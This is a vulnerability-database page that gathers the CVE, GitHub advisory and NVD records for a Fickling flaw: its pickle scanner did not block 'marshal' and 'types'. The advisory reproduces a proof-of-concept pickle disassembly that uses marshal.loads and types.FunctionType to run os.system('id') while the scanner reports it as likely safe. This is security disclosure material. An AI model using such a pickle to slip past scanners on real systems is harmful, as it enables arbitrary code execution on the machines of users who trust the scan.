cvelistv5 - cve-2025-67747

CVE-2025-67747 (GCVE-0-2025-67747)

Vulnerability from cvelistv5 – Published: 2025-12-16 00:32 – Updated: 2025-12-16 20:05

Title

Fickling has missing detection for marshal.loads and types.FunctionType in unsafe modules list

Summary

Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 are missing `marshal` and `types` from the block list of unsafe module imports. Fickling started blocking both modules to address this issue. This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues. The issue was fixed in version 0.1.6.

Severity ?

7.1 (High)


                        
                          CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

CWE

CWE-184 - Incomplete List of Disallowed Inputs
CWE-502 - Deserialization of Untrusted Data

Assigner

GitHub_M

References

URL

Tags

	https://github.com/trailofbits/fickling/security/…	x_refsource_CONFIRM
	https://github.com/trailofbits/fickling/pull/186	x_refsource_MISC
	https://github.com/trailofbits/fickling/commit/4e…	x_refsource_MISC
	https://github.com/trailofbits/fickling/releases/…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	trailofbits	fickling	Affected: < 0.1.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-67747",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-16T20:05:23.227269Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-16T20:05:35.742Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fickling",
          "vendor": "trailofbits",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.1.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 are missing `marshal` and `types` from the block list of unsafe module imports. Fickling started blocking both modules to address this issue. This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues. The issue was fixed in version 0.1.6."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-184",
              "description": "CWE-184: Incomplete List of Disallowed Inputs",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-16T00:32:52.714Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3"
        },
        {
          "name": "https://github.com/trailofbits/fickling/pull/186",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/trailofbits/fickling/pull/186"
        },
        {
          "name": "https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913"
        },
        {
          "name": "https://github.com/trailofbits/fickling/releases/tag/v0.1.6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.6"
        }
      ],
      "source": {
        "advisory": "GHSA-565g-hwwr-4pp3",
        "discovery": "UNKNOWN"
      },
      "title": "Fickling has missing detection for marshal.loads and types.FunctionType in unsafe modules list"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-67747",
    "datePublished": "2025-12-16T00:32:52.714Z",
    "dateReserved": "2025-12-11T18:08:02.947Z",
    "dateUpdated": "2025-12-16T20:05:35.742Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-67747\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-16T01:15:52.803\",\"lastModified\":\"2025-12-16T14:10:11.300\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 are missing `marshal` and `types` from the block list of unsafe module imports. Fickling started blocking both modules to address this issue. This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues. The issue was fixed in version 0.1.6.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-184\"},{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"references\":[{\"url\":\"https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/trailofbits/fickling/pull/186\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/trailofbits/fickling/releases/tag/v0.1.6\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-67747\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-16T20:05:23.227269Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-16T20:05:27.703Z\"}}], \"cna\": {\"title\": \"Fickling has missing detection for marshal.loads and types.FunctionType in unsafe modules list\", \"source\": {\"advisory\": \"GHSA-565g-hwwr-4pp3\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.1, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"trailofbits\", \"product\": \"fickling\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.1.6\"}]}], \"references\": [{\"url\": \"https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3\", \"name\": \"https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/trailofbits/fickling/pull/186\", \"name\": \"https://github.com/trailofbits/fickling/pull/186\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913\", \"name\": \"https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/trailofbits/fickling/releases/tag/v0.1.6\", \"name\": \"https://github.com/trailofbits/fickling/releases/tag/v0.1.6\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 are missing `marshal` and `types` from the block list of unsafe module imports. Fickling started blocking both modules to address this issue. This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues. The issue was fixed in version 0.1.6.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-184\", \"description\": \"CWE-184: Incomplete List of Disallowed Inputs\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-16T00:32:52.714Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-67747\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-16T20:05:35.742Z\", \"dateReserved\": \"2025-12-11T18:08:02.947Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-16T00:32:52.714Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-565G-HWWR-4PP3

Vulnerability from github – Published: 2025-12-15 23:35 – Updated: 2025-12-20 02:30

Summary

Fickling has missing detection for marshal.loads and types.FunctionType in unsafe modules list

Details

Fickling Assessment

Based on the test case provided in the original report below, this bypass was caused by marshal and types missing from the block list of unsafe module imports, Fickling started blocking both modules to address this issue. This was fixed in https://github.com/trailofbits/fickling/pull/186. The crash is unrelated and has no security impact—it will be addressed separately.

Original report

Summary

There's missing detection for the python modules, marshal.loads and types.FunctionType and Fickling throws unhandled ValueErrors when the stack is deliberately exhausted.

Details

Fickling simply doesn't have the aforementioned modules in its list of unsafe imports and therefore it fails to get detected.

PoC

The following is a disassembled view of a malicious pickle file that uses these modules:

    0: \x80 PROTO      4
    2: \x95 FRAME      0
   11: \x8c SHORT_BINUNICODE 'marshal'
   20: \x8c SHORT_BINUNICODE 'loads'
   27: \x93 STACK_GLOBAL
   28: \x94 MEMOIZE    (as 0)
   29: h    BINGET     0
   31: C    SHORT_BINBYTES b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xf30\x00\x00\x00\x95\x00S\x00S\x01K\x00r\x00\\\x00R\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"\x00S\x025\x01\x00\x00\x00\x00\x00\x00 \x00g\x01)\x03\xe9\x00\x00\x00\x00N\xda\x02id)\x02\xda\x02os\xda\x06system\xa9\x00\xf3\x00\x00\x00\x00\xda\x08<string>\xda\x08<module>r\t\x00\x00\x00\x01\x00\x00\x00s\x13\x00\x00\x00\xf0\x03\x01\x01\x01\xe3\x00\t\xd8\x00\x02\x87\t\x82\t\x88$\x85\x0fr\x07\x00\x00\x00'
  198: \x85 TUPLE1
  199: R    REDUCE
  200: \x94 MEMOIZE    (as 1)
  201: \x8c SHORT_BINUNICODE 'types'
  208: \x8c SHORT_BINUNICODE 'FunctionType'
  222: \x93 STACK_GLOBAL
  223: \x94 MEMOIZE    (as 2)
  224: h    BINGET     2
  226: h    BINGET     1
  228: }    EMPTY_DICT
  229: \x86 TUPLE2
  230: R    REDUCE
  231: \x94 MEMOIZE    (as 3)
  232: h    BINGET     3
  234: )    EMPTY_TUPLE
  235: R    REDUCE
  236: \x94 MEMOIZE    (as 4)
  237: \x8c SHORT_BINUNICODE 'gottem'
  245: b    BUILD
  246: .    STOP
 ```

When analyzing this modified file, safety_result.json shows:

{ "severity": "LIKELY_SAFE", "analysis": "Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\n\n", "detailed_results": {} }


Furthermore, when we run `fickling -s <path_to_malicious_file>`, we also encounter this error:

Traceback (most recent call last): File "/fickling", line 7, in sys.exit(main()) ^^^^^^ File "/fickling/cli.py", line 163, in main safety_results = check_safety(pickled, json_output_path=json_output_path) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/analysis.py", line 408, in check_safety results = analyzer.analyze(pickled) ^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/analysis.py", line 65, in analyze context.analyze(a) File "/fickling/analysis.py", line 31, in analyze results = list(analysis.analyze(self)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/analysis.py", line 196, in analyze for node in context.pickled.non_standard_imports(): ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/fickle.py", line 826, in non_standard_imports for node in self.properties.imports: ^^^^^^^^^^^^^^^ File "/fickling/fickle.py", line 777, in properties self._properties.visit(self.ast) ^^^^^^^^ File "/fickling/fickle.py", line 833, in ast self._ast = Interpreter.interpret(self) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/fickle.py", line 1001, in interpret return Interpreter(pickled).to_ast() ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/fickling/fickle.py", line 927, in to_ast self.run() File "/fickling/fickle.py", line 971, in run self.step() File "/fickling/fickle.py", line 989, in step opcode.run(self) File "/fickling/fickle.py", line 1767, in run raise ValueError("Exhausted the stack while searching for a MarkObject!") ValueError: Exhausted the stack while searching for a MarkObject! ```

Impact

This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for types.FunctionType and marshal.loads. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.

Severity ?

7.1 (High)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "fickling"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-67747"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-15T23:35:55Z",
    "nvd_published_at": "2025-12-16T01:15:52Z",
    "severity": "HIGH"
  },
  "details": "## Fickling Assessment\n\nBased on the test case provided in the original report below, this bypass was caused by `marshal` and `types` missing from the block list of unsafe module imports, Fickling started blocking both modules to address this issue. This was fixed in https://github.com/trailofbits/fickling/pull/186. The crash is unrelated and has no security impact\u2014it will be addressed separately.\n\n## Original report\n\n### Summary\nThere\u0027s missing detection for the python modules, `marshal.loads` and `types.FunctionType` and Fickling throws unhandled ValueErrors when the stack is deliberately exhausted.\n\n### Details\nFickling simply doesn\u0027t have the aforementioned modules in its list of unsafe imports and therefore it fails to get detected.\n\n### PoC\nThe following is a disassembled view of a malicious pickle file that uses these modules:\n```\n    0: \\x80 PROTO      4\n    2: \\x95 FRAME      0\n   11: \\x8c SHORT_BINUNICODE \u0027marshal\u0027\n   20: \\x8c SHORT_BINUNICODE \u0027loads\u0027\n   27: \\x93 STACK_GLOBAL\n   28: \\x94 MEMOIZE    (as 0)\n   29: h    BINGET     0\n   31: C    SHORT_BINBYTES b\u0027\\xe3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf30\\x00\\x00\\x00\\x95\\x00S\\x00S\\x01K\\x00r\\x00\\\\\\x00R\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\\x00S\\x025\\x01\\x00\\x00\\x00\\x00\\x00\\x00 \\x00g\\x01)\\x03\\xe9\\x00\\x00\\x00\\x00N\\xda\\x02id)\\x02\\xda\\x02os\\xda\\x06system\\xa9\\x00\\xf3\\x00\\x00\\x00\\x00\\xda\\x08\u003cstring\u003e\\xda\\x08\u003cmodule\u003er\\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00s\\x13\\x00\\x00\\x00\\xf0\\x03\\x01\\x01\\x01\\xe3\\x00\\t\\xd8\\x00\\x02\\x87\\t\\x82\\t\\x88$\\x85\\x0fr\\x07\\x00\\x00\\x00\u0027\n  198: \\x85 TUPLE1\n  199: R    REDUCE\n  200: \\x94 MEMOIZE    (as 1)\n  201: \\x8c SHORT_BINUNICODE \u0027types\u0027\n  208: \\x8c SHORT_BINUNICODE \u0027FunctionType\u0027\n  222: \\x93 STACK_GLOBAL\n  223: \\x94 MEMOIZE    (as 2)\n  224: h    BINGET     2\n  226: h    BINGET     1\n  228: }    EMPTY_DICT\n  229: \\x86 TUPLE2\n  230: R    REDUCE\n  231: \\x94 MEMOIZE    (as 3)\n  232: h    BINGET     3\n  234: )    EMPTY_TUPLE\n  235: R    REDUCE\n  236: \\x94 MEMOIZE    (as 4)\n  237: \\x8c SHORT_BINUNICODE \u0027gottem\u0027\n  245: b    BUILD\n  246: .    STOP\n ```\n\nWhen analyzing this modified file, safety_result.json shows:\n```\n{\n    \"severity\": \"LIKELY_SAFE\",\n    \"analysis\": \"Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\\n\\n\",\n    \"detailed_results\": {}\n}\n```\n\nFurthermore, when we run `fickling -s \u003cpath_to_malicious_file\u003e`, we also encounter this error:\n```\nTraceback (most recent call last):\n  File \"\u003cpath\u003e/fickling\", line 7, in \u003cmodule\u003e\n    sys.exit(main())\n             ^^^^^^\n  File \"\u003cpath\u003e/fickling/cli.py\", line 163, in main\n    safety_results = check_safety(pickled, json_output_path=json_output_path)\n                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"\u003cpath\u003e/fickling/analysis.py\", line 408, in check_safety\n    results = analyzer.analyze(pickled)\n              ^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"\u003cpath\u003e/fickling/analysis.py\", line 65, in analyze\n    context.analyze(a)\n  File \"\u003cpath\u003e/fickling/analysis.py\", line 31, in analyze\n    results = list(analysis.analyze(self))\n              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"\u003cpath\u003e/fickling/analysis.py\", line 196, in analyze\n    for node in context.pickled.non_standard_imports():\n                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"\u003cpath\u003e/fickling/fickle.py\", line 826, in non_standard_imports\n    for node in self.properties.imports:\n                ^^^^^^^^^^^^^^^\n  File \"\u003cpath\u003e/fickling/fickle.py\", line 777, in properties\n    self._properties.visit(self.ast)\n                           ^^^^^^^^\n  File \"\u003cpath\u003e/fickling/fickle.py\", line 833, in ast\n    self._ast = Interpreter.interpret(self)\n                ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"\u003cpath\u003e/fickling/fickle.py\", line 1001, in interpret\n    return Interpreter(pickled).to_ast()\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"\u003cpath\u003e/fickling/fickle.py\", line 927, in to_ast\n    self.run()\n  File \"\u003cpath\u003e/fickling/fickle.py\", line 971, in run\n    self.step()\n  File \"\u003cpath\u003e/fickling/fickle.py\", line 989, in step\n    opcode.run(self)\n  File \"\u003cpath\u003e/fickling/fickle.py\", line 1767, in run\n    raise ValueError(\"Exhausted the stack while searching for a MarkObject!\")\nValueError: Exhausted the stack while searching for a MarkObject!\n```\n\n### Impact\nThis allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.",
  "id": "GHSA-565g-hwwr-4pp3",
  "modified": "2025-12-20T02:30:33Z",
  "published": "2025-12-15T23:35:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67747"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/186"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trailofbits/fickling"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Fickling has missing detection for marshal.loads and types.FunctionType in unsafe modules list"
}

FKIE_CVE-2025-67747

Vulnerability from fkie_nvd - Published: 2025-12-16 01:15 - Updated: 2025-12-16 14:10

Severity ?

7.1 (High) - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913
	security-advisories@github.com	https://github.com/trailofbits/fickling/pull/186
	security-advisories@github.com	https://github.com/trailofbits/fickling/releases/tag/v0.1.6
	security-advisories@github.com	https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 are missing `marshal` and `types` from the block list of unsafe module imports. Fickling started blocking both modules to address this issue. This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues. The issue was fixed in version 0.1.6."
    }
  ],
  "id": "CVE-2025-67747",
  "lastModified": "2025-12-16T14:10:11.300",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "LOCAL",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.1,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-16T01:15:52.803",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/trailofbits/fickling/pull/186"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.6"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-184"
        },
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

